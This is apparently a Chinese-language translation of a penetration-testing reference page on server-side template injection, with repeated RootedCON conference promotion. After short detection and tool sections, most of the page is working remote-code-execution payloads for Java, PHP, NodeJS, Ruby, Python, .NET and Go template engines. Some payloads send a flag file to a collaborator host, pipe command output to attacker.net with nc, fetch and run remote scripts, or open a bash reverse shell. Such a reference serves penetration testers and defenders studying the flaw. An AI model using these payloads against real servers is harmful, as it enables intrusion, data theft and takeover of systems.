RootedCON 是 西班牙 最相关的网络安全事件,也是 欧洲 最重要的事件之一。该大会的 使命是促进技术知识 ,是各个学科技术和网络安全专业人士的一个热烈交流点。
什么是 SSTI (Server-Side Template Injection)
服务器端模板注入是一种漏洞,当攻击者能够将恶意代码注入到在服务器上执行的模板中时,就会发生这种漏洞。此漏洞可以在多种技术中找到,包括 Jinja。
Jinja 是一种在 web 应用程序中使用的流行模板引擎。让我们考虑一个使用 Jinja 的脆弱代码片段示例:
Copy output = template . render (name = request.args. get ( 'name' ))
在这段脆弱的代码中,用户请求中的 name
参数被直接传递到模板中,使用 render
函数。这可能允许攻击者将恶意代码注入到 name
参数中,从而导致服务器端模板注入。
例如,攻击者可以构造一个包含如下有效负载的请求:
Copy http://vulnerable-website.com/?name={{bad-stuff-here}}
The payload {{bad-stuff-here}}
被注入到 name
参数中。这个有效载荷可以包含 Jinja 模板指令,使攻击者能够执行未经授权的代码或操纵模板引擎,从而可能控制服务器。
为了防止服务器端模板注入漏洞,开发人员应确保在将用户输入插入模板之前,正确地对其进行清理和验证。实施输入验证和使用上下文感知的转义技术可以帮助减轻此漏洞的风险。
检测
要检测服务器端模板注入 (SSTI),最初,模糊测试模板 是一种简单的方法。这涉及将一系列特殊字符 (${{<%[%'"}}%\
) 注入模板,并分析服务器对常规数据与此特殊有效载荷的响应差异。漏洞指示包括:
反射中缺少有效载荷,或部分缺失,暗示服务器以不同于常规数据的方式处理它。
明文上下文 :通过检查服务器是否评估模板表达式(例如 {{7*7}}
,${7*7}
)来区分 XSS。
代码上下文 :通过更改输入参数确认漏洞。例如,改变 http://vulnerable-website.com/?greeting=data.username
中的 greeting
,查看服务器的输出是动态的还是固定的,比如 greeting=data.username}}hello
返回用户名。
识别阶段
识别模板引擎涉及分析错误消息或手动测试各种特定语言的有效载荷。常见的导致错误的有效载荷包括 ${7/0}
,{{7/0}}
和 <%= 7/0 %>
。观察服务器对数学运算的响应有助于确定特定的模板引擎。
通过有效载荷识别
工具
一个高效的 SSTI + CSTI 扫描器,利用新颖的多语言组合
Copy tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
Copy python3 sstimap.py -i -l 5
python3 sstimap.py -u "http://example.com/" --crawl 5 --forms
python3 sstimap.py -u "https://example.com/page?name=John" -s
Copy python2 . 7 . / tplmap . py - u 'http://www.target.com/page?name=John*' --os - shell
python2 . 7 . / tplmap . py - u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2 . 7 . / tplmap . py - u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 - e jade
一个包含最有效的模板注入多语言的交互式表格,以及44个最重要的模板引擎的预期响应。
漏洞
通用
在这个词汇表 中,您可以找到一些下面提到的引擎环境中定义的变量 :
Java
Java - 基本注入
Copy ${ 7 * 7 }
${{ 7 * 7 }}
${ class . getClassLoader ()}
${ class . getResource ( "" ) . getPath ()}
${ class . getResource ( "../../../../../index.htm" ) . getContent ()}
// if ${...} doesn't work try #{...}, *{...}, @{...} or ~{...}.
Java - 获取系统的环境变量
Copy ${ T( java . lang . System ) . getenv ()}
Java - 检索 /etc/passwd
Copy ${ T( java . lang . Runtime ) . getRuntime () . exec ( 'cat etc/passwd' )}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
FreeMarker (Java)
您可以在 https://try.freemarker.apache.org 尝试您的有效载荷
Copy < #assign ex = "freemarker.template.utility.Execute" ?new ()>${ ex ( "id" )}
[#assign ex = 'freemarker.template.utility.Execute' ?new ()]${ ex( 'id' ) }
${ "freemarker.template.utility.Execute" ?new ()("id")}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
Freemarker - 沙箱绕过
⚠️ 仅适用于 2.3.30 版本以下的 Freemarker
Copy < #assign classloader = article . class . protectionDomain . classLoader >
< #assign owc = classloader . loadClass ( "freemarker.template.ObjectWrapper" ) >
< #assign dwf = owc . getField ( "DEFAULT_WRAPPER" ) . get ( null ) >
< #assign ec = classloader . loadClass ( "freemarker.template.utility.Execute" ) >
${ dwf . newInstance (ec , null )( "id" )}
更多信息
Velocity (Java)
Copy // I think this doesn't work
# set($str = $class . inspect( "java.lang.String" ) . type )
# set($chr = $class . inspect( "java.lang.Character" ) . type )
# set($ex = $class . inspect( "java.lang.Runtime" ) . type . getRuntime() . exec( "whoami" ))
$ex . waitFor ()
# set($out = $ex . getInputStream())
# foreach($i in [1 .. $out . available()])
$str . valueOf ( $chr . toChars ( $out . read ()))
#end
// This should work?
# set($s = "" )
# set($stringClass = $s . getClass())
# set($runtime = $stringClass . forName( "java.lang.Runtime" ) . getRuntime())
# set($process = $runtime . exec( "cat%20/flag563378e453.txt" ))
# set($out = $process . getInputStream())
# set($ null = $process . waitFor() )
# foreach($i + in + [1 .. $out . available()])
$out . read ()
#end
更多信息
Thymeleaf
在 Thymeleaf 中,测试 SSTI 漏洞的一个常见表达式是 ${7*7}
,这同样适用于这个模板引擎。对于潜在的远程代码执行,可以使用以下表达式:
Copy ${ T( java . lang . Runtime ) . getRuntime () . exec ( 'calc' )}
Copy ${#rt = @ java.lang.Runtime@getRuntime () , # rt . exec ( "calc" )}
Thymeleaf 要求这些表达式放置在特定属性中。然而,表达式内联 对于其他模板位置是支持的,使用的语法如 [[...]]
或 [(...)]
。因此,一个简单的 SSTI 测试有效载荷可能看起来像 [[${7*7}]]
。
然而,这个有效载荷成功的可能性通常较低。Thymeleaf 的默认配置不支持动态模板生成;模板必须是预定义的。开发者需要实现自己的 TemplateResolver
来动态创建字符串模板,这并不常见。
Thymeleaf 还提供了 表达式预处理 ,其中双下划线 (__...__
) 内的表达式会被预处理。这个特性可以在构建表达式时利用,如 Thymeleaf 文档中所示:
Copy #{ selection . __$ { sel . code }__}
Thymeleaf中的漏洞示例
考虑以下代码片段,它可能容易受到利用:
Copy < a th : href = "@{__${path}__}" th : title = "${title}" >
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
这表明,如果模板引擎不正确地处理这些输入,可能会导致远程代码执行,访问类似以下的 URL:
Copy http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
更多信息
EL - Expression Language Spring 框架 (Java)
Copy * { T( org . apache . commons . io . IOUtils ) . toString ( T( java . lang . Runtime ) . getRuntime () . exec ( 'id' ) . getInputStream ())}
绕过过滤器
可以使用多个变量表达式,如果 ${...}
无法工作,请尝试 #{...}
、*{...}
、@{...}
或 ~{...}
。
Copy ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
Copy #!/usr/bin/python3
## Written By Zeyad Abulaban (zAbuQasem)
# Usage: python3 gen.py "id"
from sys import argv
cmd = list (argv[ 1 ]. strip ())
print ( "Payload: " , cmd , end = "\n\n" )
converted = [ ord (c) for c in cmd]
base_payload = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec'
end_payload = '.getInputStream())}'
count = 1
for i in converted :
if count == 1 :
base_payload += f "(T(java.lang.Character).toString( { i } ).concat"
count += 1
elif count == len (converted):
base_payload += f "(T(java.lang.Character).toString( { i } )))"
else :
base_payload += f "(T(java.lang.Character).toString( { i } )).concat"
count += 1
print (base_payload + end_payload)
更多信息
Spring 视图操作 (Java)
Copy __ ${ new java . util . Scanner ( T( java . lang . Runtime ) . getRuntime () . exec ( "id" ) . getInputStream ()) . next ()}__ :: . x
__ ${ T( java . lang . Runtime ) . getRuntime () . exec ( "touch executed" )}__ :: . x
EL - Expression Language Pebble (Java)
{{ someString.toUPPERCASE() }}
Pebble 的旧版本(< 版本 3.0.9):
Copy {{ variable . getClass () . forName ( 'java.lang.Runtime' ) . getRuntime () . exec ( 'ls -la' ) }}
新版本的 Pebble :
Copy { % set cmd = 'id' % }
{ % set bytes = ( 1 ) . TYPE
. forName ( 'java.lang.Runtime' )
. methods [ 6 ]
. invoke ( null , null )
. exec (cmd)
. inputStream
. readAllBytes () % }
{{ ( 1 ) . TYPE
. forName ( 'java.lang.String' )
. constructors [ 0 ]
. newInstance (([bytes]) . toArray ()) }}
Jinjava (Java)
Copy {{ 'a' . toUpperCase ()}} would result in 'A'
{{ request }} would return a request object like com . [ ... ] . context . TemplateContextRequest @ 23548206
Jinjava 是一个由 Hubspot 开发的开源项目,地址为 https://github.com/HubSpot/jinjava/
Jinjava - 命令执行
通过 https://github.com/HubSpot/jinjava/pull/230 修复
Copy {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
更多信息
Hubspot - HuBL (Java)
{{ request }}
- com.hubspot.content.hubl.context.TemplateContextRequest@23548206
{{'a'.toUpperCase()}}
- "A"
{{'a'.concat('b')}}
- "ab"
{{'a'.getClass()}}
- java.lang.String
{{request.getClass()}}
- class com.hubspot.content.hubl.context.TemplateContextRequest
{{request.getClass().getDeclaredMethods()[0]}}
- public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()
搜索 "com.hubspot.content.hubl.context.TemplateContextRequest" 并发现了 Jinjava 项目在 Github 上 。
Copy {{ request . isDebug ()}}
//output: False
//Using string 'a' to get an instance of class sun.misc.Launcher
{{ 'a' . getClass () . forName ( 'sun.misc.Launcher' ) . newInstance ()}}
//output: sun.misc.Launcher@715537d4
//It is also possible to get a new object of the Jinjava class
{{ 'a' . getClass () . forName ( 'com.hubspot.jinjava.JinjavaConfig' ) . newInstance ()}}
//output: com.hubspot.jinjava.JinjavaConfig@78a56797
//It was also possible to call methods on the created object by combining the
{ % % } and {{ }} blocks
{ % set ji = 'a' . getClass () . forName ( 'com.hubspot.jinjava.Jinjava' ) . newInstance () . newInterpreter () % }
{{ ji . render ( '{{1*2}}' )}}
//Here, I created a variable 'ji' with new instance of com.hubspot.jinjava.Jinjava class and obtained reference to the newInterpreter method. In the next block, I called the render method on 'ji' with expression {{1*2}}.
//{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
//output: xxx
//RCE
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
//output: java.lang.UNIXProcess@1e5f456e
//RCE with org.apache.commons.io.IOUtils.
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//output: netstat execution
//Multiple arguments to the commands
Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
更多信息
表达式语言 - EL (Java)
${{request}}, ${{session}}, {{faceContext}}
表达式语言 (EL) 是一个基本特性,促进了 JavaEE 中表现层(如网页)与应用逻辑(如托管 bean)之间的交互。它在多个 JavaEE 技术中被广泛使用,以简化这种通信。利用 EL 的关键 JavaEE 技术包括:
JavaServer Faces (JSF) :使用 EL 将 JSF 页面中的组件绑定到相应的后端数据和操作。
JavaServer Pages (JSP) :EL 在 JSP 中用于访问和操作 JSP 页面中的数据,使得连接页面元素与应用数据变得更容易。
Java EE 的上下文和依赖注入 (CDI) :EL 与 CDI 集成,允许 web 层与托管 bean 之间无缝交互,确保更连贯的应用结构。
查看以下页面以了解更多关于 EL 解释器的利用 :
EL - Expression Language Groovy (Java)
以下安全管理器绕过来自于这篇 写作 。
Copy //Basic Payload
import groovy . * ;
@ groovy.transform.ASTTest (value = {
cmd = "ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "
assert java . lang . Runtime . getRuntime () . exec ( cmd . split ( " " ))
})
def x
//Payload to get output
import groovy . * ;
@ groovy.transform.ASTTest (value = {
cmd = "whoami" ;
out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
cmd2 = "ping " + out . replaceAll ( "[^a-zA-Z0-9]" , "" ) + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net" ;
java . lang . Runtime . getRuntime () . exec ( cmd2 . split ( " " ))
})
def x
//Other payloads
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==")))
this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))
其他 Java
RootedCON 是 西班牙 最相关的网络安全事件,也是 欧洲 最重要的事件之一。该大会 旨在促进技术知识 ,是各个学科技术和网络安全专业人士的热烈交流平台。
Smarty (PHP)
Copy {$smarty . version}
{php} echo `id` ;{ / php} //deprecated in smarty v3
{ Smarty_Internal_Write_File :: writeFile ( $SCRIPT_NAME , "<?php passthru($_GET['cmd']); ?>" , self:: clearConfig ()) }
{ system ( 'ls' ) } // compatible v3
{ system ( 'cat index.php' ) } // compatible v3
更多信息
Twig (PHP)
Copy #Get Info
{{ _self }} #(Ref. to current application)
{{ _self . env }}
{{ dump (app)}}
{{ app . request . server . all | join ( ',' )}}
#File read
"{{'/etc/passwd'|file_excerpt(1,30)}}" @
#Exec code
{{ _self . env . setCache ( "ftp://attacker.net:2121" )}}{{ _self . env . loadTemplate ( "backdoor" )}}
{{ _self . env . registerUndefinedFilterCallback ( "exec" )}}{{ _self . env . getFilter ( "id" )}}
{{ _self . env . registerUndefinedFilterCallback ( "system" )}}{{ _self . env . getFilter ( "whoami" )}}
{{ _self . env . registerUndefinedFilterCallback ( "system" )}}{{ _self . env . getFilter ( "id;uname -a;hostname" )}}
{{ [ 'id' ] | filter ( 'system' )}}
{{ [ 'cat\x20/etc/passwd' ] | filter ( 'system' )}}
{{ [ 'cat$IFS/etc/passwd' ] | filter ( 'system' )}}
{{ [ 'id' , "" ] | sort ( 'system' )}}
#Hide warnings and errors for automatic exploitation
{{ [ "error_reporting" , "0" ] | sort ( "ini_set" )}}
Twig - 模板格式
Copy $output = $twig > render (
'Dear' . $_GET[ 'custom_greeting' ] ,
array( "first_name" => $user . first_name)
) ;
$output = $twig > render (
"Dear {first_name}" ,
array( "first_name" => $user . first_name)
) ;
更多信息
Plates (PHP)
Plates 是一个原生于 PHP 的模板引擎,受到 Twig 的启发。然而,与引入新语法的 Twig 不同,Plates 在模板中利用原生 PHP 代码,使其对 PHP 开发者直观易懂。
控制器:
Copy // Create new Plates instance
$templates = new League \ Plates \ Engine ( '/path/to/templates' );
// Render a template
echo $templates -> render ( 'profile' , [ 'name' => 'Jonathan' ] ) ;
页面模板:
Copy <? php $this -> layout ( 'template' , [ 'title' => 'User Profile' ] ) ?>
< h1 > User Profile </ h1 >
< p > Hello , <?= $this -> e ( $name ) ?></ p >
布局模板:
Copy < html >
< head >
< title ><?=$this->e($title)?></ title >
</ head >
< body >
<?=$this->section('content')?>
</ body >
</ html >
更多信息
PHPlib 和 HTML_Template_PHPLIB (PHP)
HTML_Template_PHPLIB 与 PHPlib 相同,但移植到 Pear。
authors.tpl
Copy < html >
< head >< title >{PAGE_TITLE}</ title ></ head >
< body >
< table >
< caption >Authors</ caption >
< thead >
< tr >< th >Name</ th >< th >Email</ th ></ tr >
</ thead >
< tfoot >
< tr >< td colspan = "2" >{NUM_AUTHORS}</ td ></ tr >
</ tfoot >
< tbody >
<!-- BEGIN authorline -->
< tr >< td >{AUTHOR_NAME}</ td >< td >{AUTHOR_EMAIL}</ td ></ tr >
<!-- END authorline -->
</ tbody >
</ table >
</ body >
</ html >
authors.php
Copy <? php
//we want to display this author list
$authors = array (
'Christian Weiske' => 'cweiske@php.net' ,
'Bjoern Schotte' => 'schotte@mayflower.de'
);
require_once 'HTML/Template/PHPLIB.php' ;
//create template object
$t =& new HTML_Template_PHPLIB ( dirname ( __FILE__ ), 'keep' );
//load file
$t -> setFile ( 'authors' , 'authors.tpl' ) ;
//set block
$t -> setBlock ( 'authors' , 'authorline' , 'authorline_ref' ) ;
//set some variables
$t -> setVar ( 'NUM_AUTHORS' , count ( $authors )) ;
$t -> setVar ( 'PAGE_TITLE' , 'Code authors as of ' . date ( 'Y-m-d' )) ;
//display the authors
foreach ($authors as $name => $email) {
$t -> setVar ( 'AUTHOR_NAME' , $name ) ;
$t -> setVar ( 'AUTHOR_EMAIL' , $email ) ;
$t -> parse ( 'authorline_ref' , 'authorline' , true ) ;
}
//finish and echo
echo $t -> finish ( $t -> parse ( 'OUT' , 'authors' )) ;
?>
更多信息
其他 PHP
Jade (NodeJS)
Copy - var x = root .process
- x = x . mainModule .require
- x = x ( 'child_process' )
= x .exec ( 'id | nc attacker.net 80' )
Copy #{ root . process . mainModule .require ( 'child_process' ) .spawnSync ( 'cat' , [ '/etc/passwd' ]).stdout}
更多信息
patTemplate (PHP)
patTemplate 是一个不编译的 PHP 模板引擎,使用 XML 标签将文档分成不同部分
Copy < patTemplate : tmpl name = "page" >
This is the main page.
< patTemplate : tmpl name = "foo" >
It contains another template.
</ patTemplate : tmpl >
< patTemplate : tmpl name = "hello" >
Hello {NAME}.< br />
</ patTemplate : tmpl >
</ patTemplate : tmpl >
更多信息
Handlebars (NodeJS)
路径遍历(更多信息 这里 )。
Copy curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
Copy {{#with "s" as | string | }}
{{#with "e" }}
{{#with split as | conslist | }}
{{ this . pop }}
{{ this . push (lookup string . sub "constructor" )}}
{{ this . pop }}
{{#with string . split as | codelist | }}
{{ this . pop }}
{{ this . push "return require('child_process').exec('whoami');" }}
{{ this . pop }}
{{#each conslist}}
{{# with ( string . sub . apply 0 codelist) }}
{{ this }}
{{ / with}}
{{ / each}}
{{ / with}}
{{ / with}}
{{ / with}}
{{ / with}}
URLencoded :
%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D
更多信息
JsRender (NodeJS)
客户端
Copy {{: % 22test % 22. toString . constructor . call ({}, % 22alert( % 27xss % 27 ) % 22 )()}}
服务器端
Copy {{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
更多信息
PugJs (NodeJS)
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}
示例服务器端渲染
Copy var pugjs = require ( 'pug' );
home = pugjs .render (injected_page)
更多信息
NUNJUCKS (NodeJS)
Copy {{ range .constructor ( "return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')" )()}}
{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>&1\"')")()}}
更多信息
其他 NodeJS
ERB (Ruby)
Copy <%= system ( "whoami" ) %> #Execute code
<%= Dir . entries ( '/' ) %> #List folder
<%= File . open ( '/etc/passwd' ). read %> #Read file
<%= system ( 'cat /etc/passwd' ) %>
<%= `ls / ` %>
<%= IO . popen ( 'ls /' ). readlines () %>
<% require 'open3' %><% @ a , @ b , @ c , @ d = Open3 . popen3 ( 'whoami' ) %><%= @ b . readline () %>
<% require 'open4' %><% @ a , @ b , @ c , @ d = Open4 . popen4 ( 'whoami' ) %><%= @ c . readline () %>
更多信息
Slim (Ruby)
更多信息
其他 Ruby
Python
查看以下页面以了解关于 绕过沙箱的任意命令执行 的技巧:
Bypass Python sandboxes Tornado (Python)
Copy { % import foobar % } = Error
{ % import os % }
{ % import os % }
{{ os . system ( 'whoami' )}}
{{ os . system ( 'whoami' )}}
更多信息
Jinja2 (Python)
官方网站
Jinja2 是一个功能齐全的 Python 模板引擎。它具有完整的 Unicode 支持、可选的集成沙箱执行环境,广泛使用并且是 BSD 许可的。
<div data-gb-custom-block data-tag="debug"></div>
Copy { % debug % }
{{ settings . SECRET_KEY }}
{{ 4 * 4 }} [[ 5 * 5 ]]
{{ 7 * '7' }} would result in 7777777
Jinja2 - 模板格式
Copy { % extends "layout.html" % }
{ % block body % }
< ul >
{ % for user in users % }
< li >< a href = " {{ user.url }} " > {{ user . username }} </ a ></ li >
{ % endfor % }
</ ul >
{ % endblock % }
RCE 不依赖于 __builtins__
:
Copy {{ self . _TemplateReference__context . cycler . __init__ . __globals__ . os . popen ( 'id' ). read () }}
{{ self . _TemplateReference__context . joiner . __init__ . __globals__ . os . popen ( 'id' ). read () }}
{{ self . _TemplateReference__context . namespace . __init__ . __globals__ . os . popen ( 'id' ). read () }}
# Or in the shotest versions:
{{ cycler . __init__ . __globals__ . os . popen ( 'id' ). read () }}
{{ joiner . __init__ . __globals__ . os . popen ( 'id' ). read () }}
{{ namespace . __init__ . __globals__ . os . popen ( 'id' ). read () }}
关于如何滥用 Jinja 的更多细节 :
Jinja2 SSTI 其他有效载荷在 https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
Mako (Python)
Copy <%
import os
x=os.popen('id').read()
%>
${x}
更多信息
其他 Python
Razor (.Net)
@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");
@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");
.NET System.Diagnostics.Process.Start
方法可用于在服务器上启动任何进程,从而创建 webshell。您可以在 https://github.com/cnotin/RazorVulnerableApp 找到一个易受攻击的 webapp 示例。
更多信息
ASP
<%= response.write(date()) %>
= <日期>
Copy <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
更多信息
Mojolicious (Perl)
即使是perl,它也使用像Ruby中的ERB这样的标签。
Copy <%= perl code %>
<% perl code %>
SSTI in GO
在 Go 的模板引擎中,可以通过特定的有效载荷确认其使用:
{{ . }}
:揭示数据结构输入。例如,如果传递了一个具有 Password
属性的对象,{{ .Password }}
可能会暴露它。
{{printf "%s" "ssti" }}
:预计显示字符串 "ssti"。
{{html "ssti"}}
,{{js "ssti"}}
:这些有效载荷应返回 "ssti",而不附加 "html" 或 "js"。可以在 Go 文档中进一步探索指令 here 。
XSS Exploitation
使用 text/template
包,XSS 可以通过直接插入有效载荷来实现。相反,html/template
包对响应进行编码以防止这种情况(例如,{{"<script>alert(1)</script>"}}
的结果是 <script>alert(1)</script>
)。然而,在 Go 中,模板定义和调用可以绕过这种编码:{{define "T1"}}alert(1){{end}} {{template "T1"}}
vbnet Copy code
RCE Exploitation
RCE 利用在 html/template
和 text/template
之间有显著差异。text/template
模块允许直接调用任何公共函数(使用 “call” 值),而在 html/template
中不允许。有关这些模块的文档可在 here for html/template 和 here for text/template 中找到。
通过 SSTI 在 Go 中进行 RCE,可以调用对象方法。例如,如果提供的对象具有执行命令的 System
方法,则可以像 {{ .System "ls" }}
一样利用它。通常需要访问源代码才能进行利用,如给定的示例所示:
Copy func (p Person) Secret (test string) string {
out, _ := exec.Command(test).CombinedOutput()
return string(out)
}
更多信息
更多漏洞
查看 https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection 以获取更多漏洞。您还可以在 https://github.com/DiogoMRSilva/websitesVulnerableToSSTI 找到有趣的标签信息。
BlackHat PDF
相关帮助
如果您认为这可能有用,请阅读:
工具
暴力破解检测列表
实践与参考
RootedCON 是 西班牙 最相关的网络安全事件,也是 欧洲 最重要的事件之一。该大会的 使命是促进技术知识 ,是各个学科的技术和网络安全专业人士的一个热烈交流点。